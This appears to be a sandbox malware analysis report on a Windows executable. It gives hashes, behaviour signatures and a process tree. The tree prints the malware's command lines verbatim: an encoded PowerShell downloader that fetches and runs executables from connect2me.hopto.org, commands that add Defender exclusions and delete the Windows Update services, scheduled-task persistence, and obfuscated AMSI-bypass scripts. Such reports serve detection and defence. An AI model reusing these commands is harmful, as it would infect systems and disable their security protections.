Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    101s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16/01/2023, 00:40

General

  • Target

    17855519b9e1bde7cabf66a422b5671d4d462968.exe

  • Size

    365KB

  • MD5

    ee244310289c82ebe8c73cfd83329f49

  • SHA1

    17855519b9e1bde7cabf66a422b5671d4d462968

  • SHA256

    702c24cbf8634002b69a57efdbede5fa256b487e97f7d9272354fdae9c363d33

  • SHA512

    20053cb845d1ef2845c85596f0d214b04fc8301cb783d8631ca8504af26706e78f046d691a65d1bd8fb9f15ff22e3136d5771f5a9394eb8d534afcc90f350d2b

  • SSDEEP

    6144:xVjDF2Bp0G3LkjLsvBrL0+ecB4X0Y37cWI+HLq11aWBLXAO19AjWbc:xRDF2BpjLQLsvBP0+ecyEY37CGP

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Stops running service(s) 3 TTPs
  • Drops startup file 1 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 55 IoCs

Processes

  • C:\Windows\system32\lsass.exe
    C:\Windows\system32\lsass.exe
    1⤵
      PID:660
    • C:\Windows\system32\winlogon.exe
      winlogon.exe
      1⤵
        PID:576
        • C:\Windows\system32\dwm.exe
          "dwm.exe"
          2⤵
            PID:1012
          • C:\Windows\System32\dllhost.exe
            C:\Windows\System32\dllhost.exe /Processid:{15b1f8f6-2ff2-46cc-907a-519bf3c9e19b}
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2040
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:944
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
              PID:2340
              • C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe
                "C:\Users\Admin\AppData\Local\Temp\17855519b9e1bde7cabf66a422b5671d4d462968.exe"
                2⤵
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4972
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4188
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
                    4⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:4740
                    • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                      "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                      5⤵
                      • Executes dropped EXE
                      • Drops startup file
                      • Suspicious use of SetThreadContext
                      • Suspicious use of WriteProcessMemory
                      PID:4712
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2696
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
                          7⤵
                          • Creates scheduled task(s)
                          PID:2064
                    • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                      "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                      5⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:2300
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 312
                  3⤵
                  • Program crash
                  PID:3248
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3028
              • C:\Windows\System32\cmd.exe
                C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:5020
                • C:\Windows\System32\sc.exe
                  sc stop UsoSvc
                  3⤵
                  • Launches sc.exe
                  PID:4956
                • C:\Windows\System32\sc.exe
                  sc stop WaaSMedicSvc
                  3⤵
                  • Launches sc.exe
                  PID:4112
                • C:\Windows\System32\sc.exe
                  sc stop wuauserv
                  3⤵
                  • Launches sc.exe
                  PID:1964
                • C:\Windows\System32\sc.exe
                  sc stop bits
                  3⤵
                  • Launches sc.exe
                  PID:3256
                • C:\Windows\System32\sc.exe
                  sc stop dosvc
                  3⤵
                  • Launches sc.exe
                  PID:1920
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                  3⤵
                    PID:4828
                  • C:\Windows\System32\reg.exe
                    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                    3⤵
                      PID:2636
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                      3⤵
                      • Modifies security service
                      PID:3200
                    • C:\Windows\System32\reg.exe
                      reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                      3⤵
                        PID:4760
                      • C:\Windows\System32\reg.exe
                        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                        3⤵
                          PID:2180
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2984
                      • C:\Windows\System32\dialer.exe
                        C:\Windows\System32\dialer.exe
                        2⤵
                          PID:1292
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 4972 -ip 4972
                        1⤵
                          PID:4016
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:eWeaOgdfVQBO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$aflNzVHGWgjtPW,[Parameter(Position=1)][Type]$SzyZOOuJDy)$NckIWEVLpjq=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+'f'+'le'+'c'+''+[Char](116)+''+[Char](101)+'d'+[Char](68)+'ele'+'g'+''+'a'+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+'e'+'m'+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+'l'+[Char](101)+''+'g'+'a'+'t'+''+'e'+'T'+'y'+''+[Char](112)+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+'Pu'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+'A'+'n'+''+[Char](115)+''+[Char](105)+'Cl'+[Char](97)+''+'s'+'s'+','+'A'+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$NckIWEVLpjq.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+'B'+'y'+''+'S'+''+[Char](105)+''+[Char](103)+',P'+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'un'+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+[Char](100)+'');$NckIWEVLpjq.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'N'+'e'+'w'+''+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+'i'+'r'+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$SzyZOOuJDy,$aflNzVHGWgjtPW).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+','+[Char](77)+'a'+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');Write-Output $NckIWEVLpjq.CreateType();}$FiQVseZHmcrEQ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+'.'+[Char](100)+''+'l'+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+'U'+'n'+'sa'+[Char](102)+''+[Char](101)+''+[Char](70)+''+[Char](105)+''+[Char](81)+''+[Char](86)+''+[Char](115)+''+[Char](101)+'ZHm'+[Char](99)+''+'r'+''+[Char](69)+''+[Char](81)+'');$tDKQEAecAKpDSk=$FiQVseZHmcrEQ.GetMethod('t'+[Char](68)+''+'K'+''+[Char](81)+''+[Char](69)+''+'A'+'e'+[Char](99)+''+'A'+''+[Char](75)+''+'p'+''+[Char](68)+''+'S'+''+[Char](107)+'',[Reflection.BindingFlags]''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'tat'+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lXUaFQdqAAQVbGRixsq=eWeaOgdfVQBO @([String])([IntPtr]);$LHRtmVjqTPAbpFqMwmfyjB=eWeaOgdfVQBO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jfspRDyfqCf=$FiQVseZHmcrEQ.GetMethod('G'+[Char](101)+''+[Char](116)+'M'+'o'+''+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+'a'+'n'+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+[Char](108)+'l')));$SEFZsKozODJUll=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](76)+'o'+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$nPGxHRUaehtPCFxHD=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$jfspRDyfqCf,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'Pr'+[Char](111)+''+[Char](116)+''+'e'+''+[Char](99)+'t')));$HintsWL=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SEFZsKozODJUll,$lXUaFQdqAAQVbGRixsq).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+'l');$RKbcduaSFzIclxOFO=$tDKQEAecAKpDSk.Invoke($Null,@([Object]$HintsWL,[Object](''+'A'+''+'m'+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+'nB'+[Char](117)+''+[Char](102)+'f'+'e'+'r')));$WNqtTcIiAS=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,4,[ref]$WNqtTcIiAS);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$RKbcduaSFzIclxOFO,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nPGxHRUaehtPCFxHD,$LHRtmVjqTPAbpFqMwmfyjB).Invoke($RKbcduaSFzIclxOFO,[uint32]8,0x20,[ref]$WNqtTcIiAS);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+'E').GetValue(''+'d'+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+'e'+''+'r'+'s'+'t'+''+[Char](97)+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)
                          1⤵
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:3252
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ViwCWEanVVqb{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EAAEmsKMTEgoCb,[Parameter(Position=1)][Type]$GhbKKLhkFZ)$xmRXvMlVtQr=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+'r'+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+'e'+'l'+'e'+[Char](103)+''+[Char](97)+''+'t'+''+'e'+''+[Char](84)+''+'y'+''+[Char](112)+''+'e'+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+''+[Char](117)+''+[Char](116)+''+'o'+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$xmRXvMlVtQr.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+''+[Char](105)+'a'+'l'+''+[Char](78)+''+[Char](97)+''+'m'+'e'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+'g,'+'P'+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e,M'+[Char](97)+''+'n'+''+[Char](97)+'g'+'e'+'d');$xmRXvMlVtQr.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,H'+[Char](105)+'d'+[Char](101)+'B'+'y'+'S'+'i'+'g'+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+[Char](108)+'o'+[Char](116)+','+[Char](86)+''+'i'+'r'+[Char](116)+'ua'+[Char](108)+'',$GhbKKLhkFZ,$EAAEmsKMTEgoCb).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $xmRXvMlVtQr.CreateType();}$usxCwMzOzvloc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+''+'.'+'d'+'l'+'l')}).GetType(''+[Char](77)+'ic'+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'f'+'t'+'.'+[Char](87)+'i'+[Char](110)+'32.U'+'n'+''+[Char](115)+''+'a'+''+[Char](102)+'e'+[Char](117)+''+[Char](115)+''+'x'+'C'+[Char](119)+''+[Char](77)+''+[Char](122)+'O'+[Char](122)+''+'v'+''+[Char](108)+''+[Char](111)+'c');$BoTDRYcMewqGUm=$usxCwMzOzvloc.GetMethod(''+[Char](66)+''+[Char](111)+''+[Char](84)+'D'+'R'+''+[Char](89)+''+[Char](99)+''+[Char](77)+''+[Char](101)+'wqG'+'U'+''+'m'+'',[Reflection.BindingFlags]''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+'t'+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FhzMlEZlNqCuLjVWETS=ViwCWEanVVqb @([String])([IntPtr]);$IgqvZrhmVfCNjmiwoWexoO=ViwCWEanVVqb @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$OWhIoSqESyC=$usxCwMzOzvloc.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+'d'+'u'+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+'n'+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('ke'+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')));$fCinQfxyStNAWR=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+[Char](98)+'r'+[Char](97)+''+'r'+''+'y'+'A')));$mKpNNihjYnyPDLdHF=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$OWhIoSqESyC,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+'rote'+'c'+'t')));$apmDBEg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fCinQfxyStNAWR,$FhzMlEZlNqCuLjVWETS).Invoke('a'+[Char](109)+'s'+[Char](105)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$vXfuVoDkBepvCwzQl=$BoTDRYcMewqGUm.Invoke($Null,@([Object]$apmDBEg,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+'c'+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+'r'+'')));$JwNxtdLprj=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,4,[ref]$JwNxtdLprj);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$vXfuVoDkBepvCwzQl,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($mKpNNihjYnyPDLdHF,$IgqvZrhmVfCNjmiwoWexoO).Invoke($vXfuVoDkBepvCwzQl,[uint32]8,0x20,[ref]$JwNxtdLprj);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'FT'+'W'+''+[Char](65)